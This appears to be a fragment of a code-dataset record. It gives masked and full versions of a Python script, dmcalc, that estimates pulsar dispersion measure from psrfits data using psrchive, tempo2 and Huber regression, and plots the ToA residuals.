ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\nmain()\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport numpy as np\nimport psrchive\nimport argparse\nimport time\nimport warnings\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nstart = time.time()\nparser = argparse.ArgumentParser(description='Code for measuring in-band ' +\n 'DM for pulsar data in psrfits format.')\nparser.add_argument('files', nargs='+', type=str, help=\n 'The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, help=\n 'Ephemeris file to update the model. Exits if not ' +\n 'given or is not available in \"PWD/ephemerides\" ' + 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str, help=\n 'Model template for ToA generation. Exits if not ' +\n 'given or is not available in \"PWD/templates\" ' + 'directory')\nparser.add_argument('-f', '--fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f', '--b3fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f', '--b5fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w', '--writeout', action='store_true', help=\n 'Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa', '--print_toas', action='store_true', help=\n 'Print the prefit ToAs to file in tempo2 format. ' + 'Def: False')\nparser.add_argument('-F', '--Fscrunch', action='store_true', help=\n 'Fully scrunch the number of channels for the ' +\n 'final output archive (Def: False)')\nparser.add_argument('-T', '--Tscrunch', action='store_true', help=\n 'Completely time scrunch all the integrations')\nparser.add_argument('-t', '--tscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of integrations for ' +\n 'the final output archive (Def: None)')\nparser.add_argument('-o', '--offset', type=float, default=0.670520675, help\n ='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', help=\n 'Only print warnings')\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... '\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... '),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\nmain()\n",
"step-5": "#!/usr/bin/python\n'''\n ** dmcalc **\nEstimates the Dispersion Measure (DM) from the data in psrfits file format.\n\nReturns the DM value with its uncertainty and reduced chi-square from tempo2 \nDM fit.\n\nDependencies \n-------------\nPSRCHIVE with python interface: http://psrchive.sourceforge.net/\nTEMPO2: https://bitbucket.org/psrsoft/tempo2\nSKLEARN: https://scikit-learn.org/stable/install.html\n\nParameters\n----------\nfile(s) : Input file(s) in psrfits format\n\nephem : Ephemeris (or parameter) file of the pulsar. This is required \n to update the model. It can be given as a command line argument. \n If it is available in \"PWD/ephemerides\" folder, one can use that.\n Giving the file with this option overrides the default one.\n\nmodel : Template profile for cross-correlating with the observation to\n obtain DM. It can be given as a command line argument, otherwise\n it will look for a matching one in \"PWD/ephemerides\" directory\n and if found, will use that instead. One can use this option to\n override the default selection.\n \nfscrunch : int, optional, default: None. Factor for scrunching the frequency \n channels before passing it to DM estimation.\n\nb3fscrunch : int, optional, default: None. Factor for scrunching the BAND3 \n data of uGMRT before passing it to DM estimation.\n\nb3fscrunch : int, optional, default: None. Factor for scrunching the BAND5 \n data of uGMRT before passing it to DM estimation.\n\noffset : float, optional, default: None. Fix for jump between BAND3 and \n BAND5 of uGMRT bands. \n\nwriteout : bool, optional, default: False. Writes out the file corrected \n for DM in a default directory (PWD/PSRJ_{site}_final), using the\n following options to reduce the file.\n\nplot : bool, optional, default: True. Prints the data analysis plot in\n a PDF file. ToA rejection steps and DM corrected ToAs are shown\n in addition to DM corrected frequency evolution of the profile.\n\nptoa : bool, optional, default: False. Prints the outliers cleaned ToAs \n to a file in the TEMPO2 readable format, so that, if required, \n it can be used for other purposes.\n \nFscrunch : bool, optional, default: False. Collapse all frequency channels\n to produce one profile.\n\nTscrunch : bool, optional, default: False. Collapse all sub-integrations\n to produce one profile.\n\ntscrunch : int, optional, default: None. Factor to scrunch sub-integrations\n for writing out the DM corrected file.\n \nquiet : bool, optional, default: False. Supresses all print statements\n except warnings and errors.\n\nReturns\n-------\nDispersion Measure with uncertainty.\n\n\nExamples\n--------\n# (a) for DM estimation with files in default directories:\n#\ndmcalc.py inputfile.fits\n#\n# (c) to use different ephemeris and template files:\n#\ndmcalc.py -E ephemeris.par -M model.fits data_file.fits\n#\n# (d) to write the DM corrected fits file and ToAs:\n#\n./dmcalc2.py -w -ptoa inputfile.fits\n\n'''\n\n\n# import modules...\nimport os\nimport sys\nimport numpy as np\nimport psrchive\nimport argparse\nimport time\nimport warnings\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\nstart = time.time()\n\nparser = argparse.ArgumentParser(description='Code for measuring in-band '+ \n 'DM for pulsar data in psrfits format.')\nparser.add_argument('files', nargs='+', type=str, \n\t\t\t\t\thelp='The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, \n\t\t\t\t\thelp='Ephemeris file to update the model. Exits if not '+\n\t\t\t\t\t 'given or is not available in \"PWD/ephemerides\" '+\n\t\t\t\t\t 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str,\n\t\t\t\t\thelp='Model template for ToA generation. Exits if not '+ \n\t\t\t\t\t 'given or is not available in \"PWD/templates\" '+\n\t\t\t\t\t 'directory')\nparser.add_argument('-f','--fscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of channels for '+ \n\t\t\t\t\t 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f','--b3fscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of channels for '+ \n\t\t\t\t\t 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f','--b5fscrunch', type=int, 